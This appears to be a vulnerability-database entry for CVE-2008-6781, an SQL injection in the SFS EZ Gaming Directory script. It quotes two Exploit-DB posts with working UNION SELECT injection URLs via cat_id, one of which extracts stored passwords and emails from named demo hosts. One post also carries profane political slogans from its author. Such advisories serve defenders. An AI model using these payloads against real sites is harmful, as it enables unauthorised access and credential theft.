CVE-2008-6781
Published 2009-05-01
Priority P341 · high · 7.5 · CVSS 2.0
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.22% (65.0th percentile)
SQL injection vulnerability in directory.php in Sites for Scripts (SFS) Gaming Directory allows remote attackers to execute arbitrary SQL commands via the cat_id parameter in a list action.
No detection rules found.
Exploit-DB
SFS EZ Gaming Directory - 'cat_id' SQL Injection
exploitdb·2008-10-31
---
#######################################################
# Author : BeyazKurt
# Contact : [email protected]
# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
# We condemn the HAGUE court. FUCK THE JUSTICE!
#
# Script : SFS Gaming Directory
# Price: $ 24.95
# Script Site: http://scripts-for-sites.com/item.php?item=112
#
# D0rk : "sie go. amk işinizmi yok xD"
#
# SQL Injection Vuln. :
#
# Exploit : SITE.COM/[path]/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
#
# Example: http://game.scripts-for-sites.com/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
#
# -------------------------------
# Ya RAMADHAN
# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
# pigs for dedication : WE Are
Exploit-DB
SFS EZ Gaming Directory - 'directory.php' SQL Injection
exploitdb·2008-10-31
---
SFS EZ Gaming Directory (directory.php id) Remote SQL Injection Vulnerability
Website script: http://www.scripts-for-sites.info/index.php
Exploit: http://localHost/gaming/directory.php?ax=list&l=list_by&cat_id=[exploit]
LiveDemo:
http://www.turnkeyzone.com/demos/gaming/directory.php?ax=list&l=list_by&cat_id=1/**/union/**/all/**/select/**/1,2,concat_ws(0x3a,password,email),4,5,6,7,8,9,10,11,12,13/**/from/**/links/*
Special Thx : Darckc0de
# milw0rm.com [2008-10-31]
No writeups or analysis indexed.
http://osvdb.org/49553
http://secunia.com/advisories/32558
http://www.securityfocus.com/bid/32021
https://exchange.xforce.ibmcloud.com/vulnerabilities/46250
https://exchange.xforce.ibmcloud.com/vulnerabilities/46251
https://www.exploit-db.com/exploits/6894
https://www.exploit-db.com/exploits/6906